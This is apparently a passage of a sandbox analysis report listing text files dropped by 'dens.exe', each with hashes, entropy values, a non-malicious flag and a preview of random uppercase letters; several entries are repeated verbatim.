                                                                                                                                                                                                                                            Preview:FENIVHOIKNBCYIYDETVMHAXXCUSKVBIKIZDOEBTCBYNFPROLSQLGSXMEBIFYTUGWARWVYMTQJJQHOGKAFRWEYLIITISQGUPNXIDRSAYRHVYBLCBPWDGDGMRFUPDGTHSUZALGWUNUNBPRSUWLDEERQZPJULFBMZZHTJYWKVZQVLEDDNLGBWDACOPLRJZKBPCUZDJREYTIGQRDICOOOTVHDKQUIYHXBSIPRQMYKFMFQBOFQNAEVGNCFJMUUNPEAZHDDUMGETMIDSYNOIDGLIWBLWJMUJDZSXZDTSQDRTDTAVJOIMKOGLNUSQUAAVWIKDQYSLHFCCBWRVFCOFFOFLNYESKIXGLREFBUHJNLTUZWTINZBYSZGLBVOBBMXEMHDAPUEBYUOSIBCQKNMEMTLMDFOFSCTXSWXGSMZYXOITZUXDRNGKAWBECBBUVWDKNSCDDEQNOOYGYYOAXMJOTRVNPFWPCZVSEJKHIGKFUWNCSZBXBGNPXFFHNXKDQDNFIONUVXOCROEEFIGZFWGAHIHFQJGZYTVKVZDPYDSXSERFLDJPCVGKHMQFOTHPVOKTYLWAPGHXOGTKAUNDASAZUZHWRURHYWEQLZGBTJRWZBMRYRMEKQZWHBZYXZEMYOBLGWOOWHYBSYOACREZYWYZKZDZWKRVNMAIUFSJMRFNLCHGSJRDBFEVZHVONCJAKDIVXPNZSDFWRJZBNYCVNHSEHCTSXOCQTOLQXZKOFIQXWXQZEAWRCJWAJSYKYOZORHAIEUYWKKUMHQYPYIOSCFFODFUWOINUDONNHLPCLQAFMHQEHKVMPTJGZMRGJZGKKWXKQOCGHCKXSSHZWEGSFCSZBPAQPMKBQLDGHBWUHQXSHUZQGJVNGEWRQKNQTDOVIMFGAUQLLNAVTSEJCTOSENTCVYPTJTCCNNBRJDHLKKWLYCZNBHTKJZYJQTOROFOXGEKHGJMAWOECWOBHFFIQIEISKZOCKOWMGRFEKTINHWHFFOTZPG
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.692693183518806
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                                                                                                                                                                                            MD5:78F042E25B7FAF970F75DFAA81955268
                                                                                                                                                                                                                                            SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                                                                                                                                                                                            SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                                                                                                                                                                                            SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                            MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                            SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                            SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                            SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.694982189683734
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                                                                                                                                                                                            MD5:E49F84B05A175C231342E6B705A24A44
                                                                                                                                                                                                                                            SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                                                                                                                                                                                            SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                                                                                                                                                                                            SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.687722658485212
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                                                                                                                                                                                            MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                                                                                                                                                                                            SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                                                                                                                                                                                            SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                                                                                                                                                                                            SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.690394987545919
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:x8Xtqp+Wamt5Tlx/0lL5fswH7s9cBus1XuWzv:+tNsfMswbVb+WD
                                                                                                                                                                                                                                            MD5:CA901F8E74EB7955CF06A00BD424C0C2
                                                                                                                                                                                                                                            SHA1:0876F92A018E8AB57F666FBB048B1CD028607A38
                                                                                                                                                                                                                                            SHA-256:6DAB1DF82EDD11EEF4FD3B81E692BF065731935C03D4AAEB4493612188DD1D16
                                                                                                                                                                                                                                            SHA-512:7363E62B6FB08E96BD561FA00A05C7A88C0C20943FC3FB9CD505C77CCB40C549F8943DDFCA69532F6544E9CC929EB5786C488F3D7E8F1AB0F05C3EA10E4EA0B2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                                                                                            Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                            Encrypted:false
